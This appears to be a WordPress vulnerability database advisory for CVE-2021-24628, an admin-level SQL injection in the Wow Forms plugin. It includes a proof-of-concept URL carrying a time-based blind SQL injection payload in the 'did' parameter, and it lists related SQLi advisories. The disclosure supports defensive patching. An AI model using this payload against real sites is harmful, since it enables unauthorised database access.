Wow Forms <= 3.1.3 – Admin+ SQL Injection | CVE 2021-24628 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape a 'did' GET parameter before using it in a SQL statement, when deleting a form in the admin dashboard, leading to an authenticated SQL injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/mwp-forms/trunk/admin/partials/main.php#L13

As admin, https://example.com/wp-admin/admin.php?page=mwp-forms&info=del&did=1%20AND%20(SELECT%209063%20FROM%20(SELECT(SLEEP(5)))YGWC)

Affects Plugins

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-mwp-forms/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

d742ab35-4e2d-42a8-bebc-b953b2e10e3c

Timeline

Publicly Published

2021-10-07 (about 2 years ago)

Added

2021-10-07 (about 2 years ago)

Last Updated

2022-04-12 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

WordPress 2.0.2 - 2.0.4 Paged Parameter SQL Injection

Published

2014-08-01

Title

Allow PHP in Posts & Pages < 2.1.0 - SQL Injection

Published

2022-10-03

Title

Form Maker by 10Web < 1.15.6 - Admin+ SQLI

Published

2024-03-28

Title

Media Library Folders < 8.1.8 - Authenticated (Author+) SQL Injection

Published

2020-08-31

Title

Recall Products <= 0.8 - Authenticated SQL Injection